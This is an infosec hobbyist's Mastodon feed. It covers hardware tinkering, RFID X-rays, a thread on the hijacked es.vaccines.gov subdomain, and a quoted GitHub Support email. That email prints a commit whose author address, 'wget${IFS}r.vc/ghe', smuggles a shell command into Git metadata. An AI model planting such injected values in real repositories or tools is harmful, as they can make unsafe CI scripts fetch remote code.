Robin Bradshaw

@en4rab@infosec.exchange
125 Followers
303 Following
332 Posts
US Chemical Safety Board to close this year

THE Trump administration plans to close the US Chemical Safety and Hazard Investigation Board (US CSB) this year, sparking fears its loss will erode industrial safety and cost lives.

One oddity seems to be the touchscreen works but only if you haven't plugged in a keyboard
Hmmmmm
Mischief managed!
I think I found the flash, tomorrow's nonsense will be removing secure boot I guess. I'm not sure this fz-a2 is worth the effort.

@q

Formatting may get slightly mangled here, but should be decipherable:

GitHub Support, Jun 11, 2025, 8:17 AM UTC

Hi Ryan,

Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

Author and committer email:

author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

Timestamps:

1668615481 -2456

The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

  • Inspecting how it got into the repository

  • Rewriting history to remove it (if it was part of a PR or forced push)

  • Checking your workflow or scripts for unsafe parsing of Git metadata

Please give this a try and update me on how it goes.

Go look at the U.S. federal vaccines hub -- do it now

ADDING: It's a DNS hack, pointing that .gov subdomain at an AWS site.

Just scroll down a bit. And I'll add, at the moment those pages are NSFW ... only the best people running stuff there now!

https://es.vaccines.gov/

@en4rab made a bunch of x-rays of common RFID tags. They are so crisp and nice.

Look at this #hitag2
You can see all the thin windings of the antenna and the markings on the IC package.

#rfidhack #hacking

My friend Buy it Fix it bought the same X-ray machine as the one I got and did a video about it.
https://www.youtube.com/watch?v=MgT22byFe64
I Bought A Medical X-Ray Machine, and it's AWESOME! (Including Teardown)

YouTube
×

Go look at the U.S. federal vaccines hub -- do it now

ADDING: It's a DNS hack, pointing that .gov subdomain at an AWS site.

Just scroll down a bit. And I'll add, at the moment those pages are NSFW ... only the best people running stuff there now!

https://es.vaccines.gov/

More: This appears to be a DNS hack, pointing at an AWS site.
@lauren what in the actual f...?
@lauren Your gov‘t hard at work.

@lauren

That's very funny, but what's actually going on there? Aside from the .gov domain, it doesn't seem to be a federal website?

@bruce If it's .gov, it's a U.S. government website, by definition. In this case, some deeper page inside vaccines.gov.

@lauren

I noticed the "es" subdomain, but I don't know what it signifies. In any case, was this a hack? A disgruntled employee? An otherwise innocuous page that was used in a way its designers didn't intend?

I think it's hilarious, but I'm just confused.

@bruce @lauren It's likely a dangling hostname - it points to AWS, someone managed to get that IP.
@bruce @lauren .es most likely signifies an "Espanol" version of the site. Presumably it's a neglected/unpatched WordPress site that got compromised and is now being used to get ad revenue
@kevinmirsky @bruce No, it appears to be a DNS hack pointing at an AWS site.

@lauren @kevinmirsky

Yup! Thanks to @ryanc, I've been reading about dangling hostnames. That's a new one to me.

Thanks, Ryan!

@kevinmirsky @bruce @lauren The Spanish version is https://www.vaccines.gov/es/ not the es subdomain.
Encuentre farmacias cerca de usted

Vaccines.gov lo ayuda a encontrar farmacias cercanas en los Estados Unidos

@BoydStephenSmithJr @bruce @lauren Looks like it at least once was for Spanish.

https://archive.is/9EoVV

@kevinmirsky @bruce @lauren Even then, it was a redirect. I wonder who decided they didn't need to (at least) keep a redirect in place. It would be easy to blame Elmu or DOGE, but it's also a fairly simple mistake to make, especially if you've got some guarantee no internal page contains links to the es subdomain.

Still. Hope it is fixed soon. The .gov is restricted for a reason, and it gives the contents weight/legitimacy instantly if you don't think too hard about it (and no one can be hyper-vigilant all the time).

@BoydStephenSmithJr @bruce @lauren yeah, not terribly surprising it was forgotten about as it's for a secondary version of what may be a lower priority site. Consider a potential changing of the back end and oops, no one realized this was still out there
@kevinmirsky @BoydStephenSmithJr @bruce Trump ordered most of the non-English pages removed, that could have left that subdomain empty and misconfigured at the DNS level in way that opened it to hacking.
@lauren @bruce https://www.vaccines.gov/ only seems to link to the cdc.gov site, I don't think es subdomain is actually part of any government site.
Find pharmacies near you

Vaccines.gov helps you find nearby pharmacies in the United States.

@BoydStephenSmithJr @bruce It's a hack to the .gov DNS entry for vaccines.gov.
@bruce @lauren
Elon and Orange broke up.
Elon has the data and the keys.
@lauren I had to like for the cat pic but, I clicked, scrolled down and... wow....
@Nikkileah Yeah, when it started I saw strange posts about planes, then it escalated.
@lauren
It takes big balls to turn a government site into a party.
@lauren should let people know that this is not safe for work...
@camless I did as soon as it went in that direction. At first I didn't see any NSWF, just odd stuff about planes, etc.
@lauren Right?? It's a brave, new, Orwellian world
@lauren Our tax dollars at work! 😂
@lauren Don't show that to your kids. Most of the page is fine, but the first article is actively harmful!

@lauren 👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀
Whomever Ashley is (the poster on the site of the articles), they have an "eclectic" display of what might be the first display of "article tourettes"

Find a grouping of more fascinating articles with only the loosest threads binding them, I dare you.

@lauren

It's now gone:

~$ nslookup es.vaccines.gov
Server: 127.0.0.53
Address: 127.0.0.53#53

** server can't find es.vaccines.gov: NXDOMAIN

~$

I didn't see the .gov site before it went down, but could it be related to this recent story? Some of the slop described here is definitely NSFW.

https://www.404media.co/spam-blogs-ai-slop-domains-wowlazy/

@lauren Thanks for pointing this out.

What I wonder, is what the next act is

There have been some strange things done recently with fast computers